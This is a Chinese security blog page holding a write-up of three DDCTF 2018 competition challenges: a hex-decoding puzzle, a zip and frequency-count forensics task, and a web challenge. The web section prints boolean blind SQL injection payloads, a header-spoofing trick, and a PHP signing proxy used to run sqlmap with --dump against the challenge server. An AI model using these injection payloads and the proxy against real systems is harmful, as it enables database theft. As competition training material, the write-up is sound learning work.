<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>DDCTF三道小结 | Mang0&#39;s blog</title>
  <meta name="keywords" content=" WP ">
  <meta name="description" content="DDCTF三道小结 | Mang0&#39;s blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="Mang0&#39;s blog">
<meta property="og:url" content="http://0xmj.club/404.html">
<meta property="og:site_name" content="Mang0&#39;s blog">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-10-07T10:21:52.994Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Mang0&#39;s blog">


<link rel="icon" href="/img/head.jpg">

<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/hl_theme/atom-light.css">

<link href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>


</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
</div>
<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/head.jpg" />
</a>
<div class="author">
    <span>Mang0</span>
</div>
<div class="icon">
    
    <a class="rss" title="rss" href="https://www.zhihu.com/people/dai-meng-jie" target="_blank"></a>
    
    
    <a class="github" title="github" href="https://github.com/0xMJ" target="_blank"></a>
    
    
    
    
    
    <a class="instagram" title="instagram" href="https://www.instagram.com/1_be_winner/" target="_blank"></a>
    
    
    
    <a class="weibo" title="weibo" href="http://weibo.com/u/3606330100/" target="_blank"></a>
    
    
    <a class="email" title="email" href="mailto:951207194@qq.com"></a>
    
</div>
<ul>
    <li class="all active">全部文章</li>
    
    <li data-rel="思考"> 思考 </li>
    
    <li data-rel="CTF"> CTF </li>
    
    <li data-rel="代码审计"> 代码审计 </li>
    
    <li data-rel="Kali"> Kali </li>
    
    <li data-rel="SQL"> SQL </li>
    
    <li data-rel="博客"> 博客 </li>
    
    <li data-rel="工具"> 工具 </li>
    
    <li data-rel="Web安全"> Web安全 </li>
    
    <li data-rel="渗透测试"> 渗透测试 </li>
    
    <li data-rel="读书摘要"> 读书摘要 </li>
    
</ul>
<div class="left-bottom">
    <a class="about" href="/about">关于</a><a class="friends">友链</a>
</div>
<input type="hidden" id="yelog_site_posts_number" value="37">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>
    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://ph0rse.me/">Ph0rse</a></li>
            
            <li><a target="_blank" href="http://03i0.com/">Snoopy</a></li>
            
            <li><a target="_blank" href="http://www.cnblogs.com/iamstudy/">I3m0n</a></li>
            
            <li><a target="_blank" href="http://bbs.tesla-space.com/">hack学习</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off">
        <i class="cross"></i>
        <span>
        <label for="tagswitch">Tags:</label>
        <input id="tagswitch" type="checkbox">
    </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">思考</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">first-blog</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">WP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">代码审计</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">Nmap</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">sqlmap</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">sqlilabs</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">hexo</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">VIM</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">NETCAT</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">TCPDUMP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">密码学</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">文件包含</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">Nikto</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">Vega</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">QWASP_ZAP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">Skipfish</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">信息收集</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">CTF</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">渗透</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">文件上传</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">黑客攻防web安全实战详解</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">入侵</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">Dvwa</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    <nav>
        
        <a  class="思考 "
           href="/2017/11/22/17-11反思与进取/"
           data-tag="思考"
           data-author="" >
            <span class="post-title" title="17-11反思与进取">17-11反思与进取</span>
            <span class="post-date" title="2017-11-22 17:10:55">2017/11/22</span>
        </a>
        
        <a  class="思考 "
           href="/2017/09/27/Hello World /"
           data-tag="first-blog"
           data-author="" >
            <span class="post-title" title="my-first-blog">my-first-blog</span>
            <span class="post-date" title="2017-09-27 16:56:58">2017/09/27</span>
        </a>
        
        <a  class="CTF "
           href="/2018/06/20/2018SCTF-wp/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="2018SCTF-wp">2018SCTF-wp</span>
            <span class="post-date" title="2018-06-20 22:40:40">2018/06/20</span>
        </a>
        
        <a  class="CTF "
           href="/2018/04/23/DDCTF三道小结/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="DDCTF三道小结">DDCTF三道小结</span>
            <span class="post-date" title="2018-04-23 21:35:39">2018/04/23</span>
        </a>
        
        <a  class="代码审计 "
           href="/2018/08/25/PHP字符串-和“区别/"
           data-tag="代码审计"
           data-author="" >
            <span class="post-title" title="PHP字符串&#39;和“区别">PHP字符串&#39;和“区别</span>
            <span class="post-date" title="2018-08-25 20:22:01">2018/08/25</span>
        </a>
        
        <a  class="Kali "
           href="/2018/04/23/Nmap-使用技巧汇总/"
           data-tag="Nmap"
           data-author="" >
            <span class="post-title" title="Nmap 使用技巧汇总">Nmap 使用技巧汇总</span>
            <span class="post-date" title="2018-04-23 22:07:46">2018/04/23</span>
        </a>
        
        <a  class="SQL "
           href="/2017/11/21/SQLMAP注入教程-11种常见SQLMAP使用方法详解/"
           data-tag="sqlmap"
           data-author="" >
            <span class="post-title" title="SQLMAP注入教程-11种常见SQLMAP使用方法详解">SQLMAP注入教程-11种常见SQLMAP使用方法详解</span>
            <span class="post-date" title="2017-11-21 04:27:10">2017/11/21</span>
        </a>
        
        <a  class="SQL "
           href="/2018/04/02/Sqli-labs-1-4/"
           data-tag="sqlilabs"
           data-author="" >
            <span class="post-title" title="Sqli-labs  1-4">Sqli-labs  1-4</span>
            <span class="post-date" title="2018-04-02 16:13:07">2018/04/02</span>
        </a>
        
        <a  class="博客 "
           href="/2017/11/22/hexo博客搭建/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="hexo博客搭建">hexo博客搭建</span>
            <span class="post-date" title="2017-11-22 16:57:45">2017/11/22</span>
        </a>
        
        <a  class="CTF "
           href="/2018/05/01/bugku-misc/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="bugku-misc">bugku-misc</span>
            <span class="post-date" title="2018-05-01 19:02:14">2018/05/01</span>
        </a>
        
        <a  class="CTF "
           href="/2018/05/28/ISCC2018-writeup/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="ISCC2018-writeup">ISCC2018-writeup</span>
            <span class="post-date" title="2018-05-28 00:54:05">2018/05/28</span>
        </a>
        
        <a  class="工具 "
           href="/2017/12/15/Vim简单入门笔记/"
           data-tag="VIM"
           data-author="" >
            <span class="post-title" title="Vim简单入门笔记">Vim简单入门笔记</span>
            <span class="post-date" title="2017-12-15 19:07:45">2017/12/15</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-工具-NETCAT/"
           data-tag="NETCAT"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-工具-NETCAT">kali渗透测试之Web渗透-工具-NETCAT</span>
            <span class="post-date" title="2018-02-27 19:38:09">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-工具-TCPDUMP/"
           data-tag="TCPDUMP"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-工具-TCPDUMP">kali渗透测试之Web渗透-工具-TCPDUMP</span>
            <span class="post-date" title="2018-02-27 19:42:43">2018/02/27</span>
        </a>
        
        <a  class="Web安全 "
           href="/2018/06/01/cbc字节翻转攻击/"
           data-tag="密码学"
           data-author="" >
            <span class="post-title" title="cbc字节翻转攻击">cbc字节翻转攻击</span>
            <span class="post-date" title="2018-06-01 00:47:50">2018/06/01</span>
        </a>
        
        <a  class="Web安全 "
           href="/2018/04/23/php文件包含漏洞/"
           data-tag="文件包含"
           data-author="" >
            <span class="post-title" title="php文件包含漏洞">php文件包含漏洞</span>
            <span class="post-date" title="2018-04-23 21:39:49">2018/04/23</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Nikto/"
           data-tag="Nikto"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Nikto">kali渗透测试之Web渗透-扫描工具-Nikto</span>
            <span class="post-date" title="2018-02-27 19:47:03">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Vega/"
           data-tag="Vega"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Vega">kali渗透测试之Web渗透-扫描工具-Vega</span>
            <span class="post-date" title="2018-02-27 19:51:36">2018/02/27</span>
        </a>
        
        <a  class=""
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-QWASP-ZAP/"
           data-tag="QWASP_ZAP"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-QWASP_ZAP">kali渗透测试之Web渗透-扫描工具-QWASP_ZAP</span>
            <span class="post-date" title="2018-02-27 19:54:20">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Skipfish/"
           data-tag="Skipfish"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Skipfish">kali渗透测试之Web渗透-扫描工具-Skipfish</span>
            <span class="post-date" title="2018-02-27 19:49:37">2018/02/27</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/04/02/信息收集/"
           data-tag="信息收集"
           data-author="" >
            <span class="post-title" title="信息收集">信息收集</span>
            <span class="post-date" title="2018-04-02 16:15:51">2018/04/02</span>
        </a>
        
        <a  class="SQL "
           href="/2018/04/02/sqli-labs5-6-盲注/"
           data-tag="sqlilabs"
           data-author="" >
            <span class="post-title" title="sqli-labs5-6(盲注)">sqli-labs5-6(盲注)</span>
            <span class="post-date" title="2018-04-02 16:14:58">2018/04/02</span>
        </a>
        
        <a  class="代码审计 "
           href="/2018/08/25/墨者学院php代码审计1/"
           data-tag="代码审计"
           data-author="" >
            <span class="post-title" title="墨者学院php代码审计1">墨者学院php代码审计1</span>
            <span class="post-date" title="2018-08-25 20:32:48">2018/08/25</span>
        </a>
        
        <a  class="CTF "
           href="/2018/08/25/安恒七月/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="安恒7月">安恒7月</span>
            <span class="post-date" title="2018-08-25 20:39:36">2018/08/25</span>
        </a>
        
        <a  class="思考 "
           href="/2018/08/01/八月展望/"
           data-tag="思考"
           data-author="" >
            <span class="post-title" title="八月展望">八月展望</span>
            <span class="post-date" title="2018-08-01 23:41:26">2018/08/01</span>
        </a>
        
        <a  class="CTF "
           href="/2018/08/25/安恒五月/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="安恒5月">安恒5月</span>
            <span class="post-date" title="2018-08-25 20:40:51">2018/08/25</span>
        </a>
        
        <a  class="CTF "
           href="/2018/05/15/全国网络空间安全技术大赛2018三道wp/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="全国网络空间安全技术大赛2018三道wp">全国网络空间安全技术大赛2018三道wp</span>
            <span class="post-date" title="2018-05-15 19:04:17">2018/05/15</span>
        </a>
        
        <a  class="CTF "
           href="/2018/04/02/实验吧web—writeup/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="实验吧web—writeup">实验吧web—writeup</span>
            <span class="post-date" title="2018-04-02 16:10:18">2018/04/02</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/08/01/渗透测试基础/"
           data-tag="渗透"
           data-author="" >
            <span class="post-title" title="渗透测试基础">渗透测试基础</span>
            <span class="post-date" title="2018-08-01 23:43:32">2018/08/01</span>
        </a>
        
        <a  class="SQL "
           href="/2018/04/02/sqli-labs-less7-10/"
           data-tag="sqlilabs"
           data-author="" >
            <span class="post-title" title="sqli-labs  less7-10">sqli-labs  less7-10</span>
            <span class="post-date" title="2018-04-02 16:15:23">2018/04/02</span>
        </a>
        
        <a  class="SQL "
           href="/2018/04/02/sqli-labs-less11-15/"
           data-tag="sqlilabs"
           data-author="" >
            <span class="post-title" title="sqli-labs less11-15">sqli-labs less11-15</span>
            <span class="post-date" title="2018-04-02 16:15:38">2018/04/02</span>
        </a>
        
        <a  class="Web安全 "
           href="/2018/04/23/文件上传总结/"
           data-tag="文件上传"
           data-author="" >
            <span class="post-title" title="文件上传总结">文件上传总结</span>
            <span class="post-date" title="2018-04-23 21:39:03">2018/04/23</span>
        </a>
        
        <a  class="读书摘要 "
           href="/2018/02/27/黑客攻防web安全实战详解/"
           data-tag="黑客攻防web安全实战详解"
           data-author="" >
            <span class="post-title" title="黑客攻防web安全实战详解">黑客攻防web安全实战详解</span>
            <span class="post-date" title="2018-02-27 19:57:12">2018/02/27</span>
        </a>
        
        <a  class="CTF "
           href="/2017/10/20/第八届Geek部分web/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="第八届Geek部分web">第八届Geek部分web</span>
            <span class="post-date" title="2017-10-20 16:07:05">2017/10/20</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/04/23/高级入侵/"
           data-tag="入侵"
           data-author="" >
            <span class="post-title" title="高级入侵">高级入侵</span>
            <span class="post-date" title="2018-04-23 21:33:14">2018/04/23</span>
        </a>
        
        <a  class="CTF "
           href="/2018/04/02/第二届强网杯-部分wp/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="第二届强网杯-部分wp">第二届强网杯-部分wp</span>
            <span class="post-date" title="2018-04-02 16:08:51">2018/04/02</span>
        </a>
        
        <a  class="Web安全 "
           href="/2017/11/22/DVWA笔记/"
           data-tag="Dvwa"
           data-author="" >
            <span class="post-title" title="DVWA笔记">DVWA笔记</span>
            <span class="post-date" title="2017-11-22 17:06:26">2017/11/22</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-DDCTF三道小结" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">DDCTF三道小结</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
            <a href="javascript:" data-rel="CTF">CTF</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color3">WP</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2018-04-23 21:36:28'>2018-04-23 21:35</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DDCTF三道小结"><span class="toc-text">DDCTF三道小结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#╯°□°）╯︵-┻━┻"><span class="toc-text">(╯°□°）╯︵ ┻━┻</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第四扩展FS"><span class="toc-text">第四扩展FS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-1-数据库的秘密"><span class="toc-text">Web 1 数据库的秘密</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="DDCTF三道小结"><a href="#DDCTF三道小结" class="headerlink" title="DDCTF三道小结"></a>DDCTF三道小结</h1><p>太菜了 就只能做出三道题，继续加油，明年再战</p>
<h2 id="╯°□°）╯︵-┻━┻"><a href="#╯°□°）╯︵-┻━┻" class="headerlink" title="(╯°□°）╯︵ ┻━┻"></a>(╯°□°）╯︵ ┻━┻</h2><p>d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb7b9b8e4b5b5e4e2b7b6b5b5b2e1b9b2b2e4b0b0e4b7b7b5e5b3b3b1b1b9b0b7fd</p>
<p>进制转换，先将16进制转换为10进制，再对128求余，剩下的结果转换为字符。</p>
<pre><code class="python">ascii=&quot;212 232 225 244 160 247 225 243 160 230 225 243 244 161 160 212 232 229 160 230 236 225 231 160 233 243 186 160 196 196 195 212 198 251 185 178 178 225 226 185 185 183 180 225 180 183 227 228 179 178 178 227 230 180 179 226 181 176 182 177 176 230 225 229 225 181 253&quot;
newlist=ascii.split()
newlist2=ascii.split()
for i in range(90,160):
    for j in range(len(newlist)):
        newlist2[j]=int(newlist[j])-i
    for k in newlist2:
        print chr(int(k)),
    print &quot;&quot;
</code></pre>
<p>​    </p>
<p><img src="http://oy0tigw51.bkt.clouddn.com/201804192226_410.png" alt=""></p>
<p> DDCTF{922ab9974a47cd322cf43b50610faea5}</p>
<h2 id="第四扩展FS"><a href="#第四扩展FS" class="headerlink" title="第四扩展FS"></a>第四扩展FS</h2><p><img src="http://oy0tigw51.bkt.clouddn.com/201804192234_752.png" alt=""></p>
<p>分析得到有一个压缩包</p>
<p>foremost出来得到zip，</p>
<p>解压密码在windows.jpg属性的备注</p>
<p><img src="http://oy0tigw51.bkt.clouddn.com/201804192236_14.png" alt=""></p>
<p>Pactera</p>
<p>（插曲我一开始以为是crc32攻击）逃 </p>
<p>解压得到file</p>
<p>根据提示进行字符频度统计即可得到flag。</p>
<p><a href="http://www.aihanyu.org/cncorpus/CpsTongji.aspx" target="_blank" rel="external">http://www.aihanyu.org/cncorpus/CpsTongji.aspx</a></p>
<table>
<thead>
<tr>
<th>词</th>
<th>频次</th>
<th>频率 %</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>D</td>
<td>3950</td>
<td>12.9381</td>
</tr>
<tr>
<td>2</td>
<td>C</td>
<td>1900</td>
<td>6.2234</td>
</tr>
<tr>
<td>3</td>
<td>T</td>
<td>1850</td>
<td>6.0596</td>
</tr>
<tr>
<td>4</td>
<td>F</td>
<td>1800</td>
<td>5.8958</td>
</tr>
<tr>
<td>5</td>
<td>{</td>
<td>1750</td>
<td>5.7321</td>
</tr>
<tr>
<td>6</td>
<td>t</td>
<td>1700</td>
<td>5.5683</td>
</tr>
<tr>
<td>7</td>
<td>u</td>
<td>1650</td>
<td>5.4045</td>
</tr>
<tr>
<td>8</td>
<td>0</td>
<td>1600</td>
<td>5.2407</td>
</tr>
<tr>
<td>9</td>
<td>k</td>
<td>1550</td>
<td>5.077</td>
</tr>
<tr>
<td>10</td>
<td>U</td>
<td>1500</td>
<td>4.9132</td>
</tr>
<tr>
<td>11</td>
<td>a</td>
<td>1450</td>
<td>4.7494</td>
</tr>
<tr>
<td>12</td>
<td>n</td>
<td>1400</td>
<td>4.5857</td>
</tr>
<tr>
<td>13</td>
<td>s</td>
<td>1350</td>
<td>4.4219</td>
</tr>
<tr>
<td>14</td>
<td>h</td>
<td>1300</td>
<td>4.2581</td>
</tr>
<tr>
<td>15</td>
<td>i</td>
<td>1250</td>
<td>4.0943</td>
</tr>
<tr>
<td>16</td>
<td>y</td>
<td>1200</td>
<td>3.9306</td>
</tr>
<tr>
<td>17</td>
<td>e</td>
<td>1150</td>
<td>3.7668</td>
</tr>
<tr>
<td>18</td>
<td>!</td>
<td>1100</td>
<td>3.603</td>
</tr>
<tr>
<td>19</td>
<td>}</td>
<td></td>
</tr>
</tbody>
</table>
<p>DDCTF{tu0kUanshiye!}</p>
<h2 id="Web-1-数据库的秘密"><a href="#Web-1-数据库的秘密" class="headerlink" title="Web 1 数据库的秘密"></a>Web 1 数据库的秘密</h2><p><img src="http://oy0tigw51.bkt.clouddn.com/201804212006_929.png" alt=""></p>
<p>使用插件modify headers加一个x-forward-for: 123.232.23.245</p>
<p><img src="http://oy0tigw51.bkt.clouddn.com/201804212005_33.png" alt=""></p>
<p>打开题目是三个搜索框和一个数据表格，分析form表单发现隐藏一处所以更改本地复现进行注入</p>
<p><img src="http://oy0tigw51.bkt.clouddn.com/201804220047_85.png" alt=""></p>
<p>发现是bool盲注，并用burp fuzz一下</p>
<p><img src="http://oy0tigw51.bkt.clouddn.com/201804220050_110.png" alt=""></p>
<p>发现union，database（）都被过滤</p>
<p>准语句：0’&amp;&amp;if(ascii(substr((select version()),1,1))&gt;0,1,0)#</p>
<p>得到库名：0’ &amp;&amp; if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))&gt;0,1,0)#：DDCTF</p>
<p>得到表名0’&amp;&amp;if(ascii(substr((select table_name from information_schema.tables where table_schema=’ddctf’))&gt;0,1,0)#：ctf_key1</p>
<p>得到字段名 0’&amp;&amp;if(ascii(substr((select column_name from information_schema.columns where table_name=’ctf_key1’ limit 0,1),9,1))&gt;0,1,0)#：secvalue</p>
<p>得到flag  0’&amp;&amp;if(ascii(substr((select secvalue from ctf_key1 limit 0,1),1,1))&gt;0,1,0)#   ====0’ &amp;&amp; substr((select secvalue from ddctf.ctf_key1 limit 0,1),1,1)=’d’#</p>
<p>DDCTF{IKIDLHNZMKFUDEQE}</p>
<blockquote>
<p><strong>substr()函数</strong></p>
<p>​    Substr()和substring()函数实现的功能是一样的，均为截取字符串。</p>
<p>​    string substring(string, start, length)</p>
<p>​    string substr(string, start, length)</p>
<p>​    参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。</p>
</blockquote>
<p>另附大佬一的奇特方法直接显注：</p>
<p>此waf为假waf 使用超过100个参数可以绕过</p>
<p><a href="http://www.hayasec.me/2018/04/20/ddctf-web1-writeup/" target="_blank" rel="external">http://www.hayasec.me/2018/04/20/ddctf-web1-writeup/</a></p>
<p>大佬二sqlmap一把梭：</p>
<p>对于此题，采用了使用 PHP 编写代理页面的方式，对请求进行了代理并签名。之后使用 sqlmap 等通用工具对该 PHP 页面进行注入即可。<br><code>proxy.php</code> 代码如下：</p>
<pre><code>&lt;?php
@$id = $_REQUEST[&#39;id&#39;];
@$title = $_REQUEST[&#39;title&#39;];
@$author = $_REQUEST[&#39;author&#39;];
@$date = $_REQUEST[&#39;date&#39;];
$time = time();
$sig = sha1(&#39;id=&#39;.$id.&#39;title=&#39;.$title.&#39;author=&#39;.$author.&#39;date=&#39;.$date.&#39;time=&#39;.$time.&#39;adrefkfweodfsdpiru&#39;);

$ch = curl_init();

$post = [
    &#39;id&#39; =&gt; $id,
    &#39;title&#39; =&gt; $title,
    &#39;author&#39; =&gt; $author,
    &#39;date&#39; =&gt; $date,
];

curl_setopt($ch, CURLOPT_URL,&quot;http://116.85.43.88:8080/KREKGJVFPYQKERQR/dfe3ia/index.php?sig=$sig&amp;time=$time&quot;);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    &#39;X-Forwarded-For: 123.232.23.245&#39;,
    ));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$ch_out = curl_exec($ch);
$ch_info = curl_getinfo($ch);

$header = substr($ch_out, 0, $ch_info[&#39;header_size&#39;]);
$body = substr($ch_out, $ch_info[&#39;header_size&#39;]);

http_response_code($ch_info[&#39;http_code&#39;]);
//header($header);
//echo $header;
echo $body;
</code></pre><p>sqlmap 一把梭，对代理 PHP 页面进行注入，注入点果然位于 <code>author</code>，获得 flag。</p>
<blockquote>
<p><code>sqlmap.py -u &#39;http://127.0.0.1/proxy.php?author=admin&#39; --dump</code></p>
</blockquote>
<p><img src="https://clannad.me/image/web-1.png" alt="Web-1"></p>
<p><a href="https://clannad.me/ddctf.md.html" target="_blank" rel="external">https://clannad.me/ddctf.md.html</a></p>
<p><a href="http://sec2hack.com/ctf/ddctf-2018-web-writeup.html" target="_blank" rel="external">http://sec2hack.com/ctf/ddctf-2018-web-writeup.html</a></p>

      
       <hr><span style="font-style: italic;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 951207194@qq.com </span>
    </div>
</article>


<p>
    <a href="javascript:void(0)" class="dashang" onclick="dashangToggle()">赏</a>
</p>



    



    

    </div>
    <div class="copyright">
        <p class="footer-entry">©2017 0xMJ</p>
<p class="footer-entry">Buit with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>
<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>
</body>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>
<script src="/js/script.js"></script>
<script>
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#思考','#first-blog','#WP','#代码审计','#Nmap','#sqlmap','#sqlilabs','#hexo','#VIM','#NETCAT','#TCPDUMP','#密码学','#文件包含','#Nikto','#Vega','#QWASP_ZAP','#Skipfish','#信息收集','#CTF','#渗透','#文件上传','#黑客攻防web安全实战详解','#入侵','#Dvwa',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1;
            var $numbering = $('<ul/>').addClass('pre-numbering').attr("unselectable","on");
            $(this).addClass('has-numbering')
                    .parent()
                    .append($numbering);
            for(i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
